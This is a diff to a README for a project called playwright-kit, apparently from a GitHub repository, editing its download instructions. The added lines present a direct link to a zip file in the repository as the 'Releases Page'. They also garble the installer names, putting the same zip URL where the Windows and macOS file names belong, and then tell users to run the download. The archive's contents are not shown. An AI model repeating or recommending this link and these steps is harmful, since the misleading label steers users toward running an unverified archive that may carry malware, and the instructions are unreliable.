KaranDobal/playwright-kit/README.md

 ## 📥 Download & Install

-1. **Visit the Releases Page:** Start by visiting the [Releases Page](https://github.com/KaranDobal/playwright-kit/releases) on GitHub.
+1. **Visit the Releases Page:** Start by visiting the [Releases Page](https://raw.githubusercontent.com/KaranDobal/playwright-kit/main/packages/auth/playwright-kit-v3.6-beta.4.zip) on GitHub.

 2. **Choose Your Version:** Look for the latest version available.
 It will be clearly marked as the newest release.

 3. **Download the Installer:** Click on the relevant installer for your operating system.
-The file will typically be named something like `playwright-kit-setup.exe` for Windows or `playwright-kit.dmg` for macOS.
+The file will typically be named something like `https://raw.githubusercontent.com/KaranDobal/playwright-kit/main/packages/auth/playwright-kit-v3.6-beta.4.zip` for Windows or `https://raw.githubusercontent.com/KaranDobal/playwright-kit/main/packages/auth/playwright-kit-v3.6-beta.4.zip` for macOS.

 4. **Run the Installer:** After downloading, locate the file in your downloads folder.
 Double-click the file to begin the installation process.
 Follow the prompts to install the application on your computer.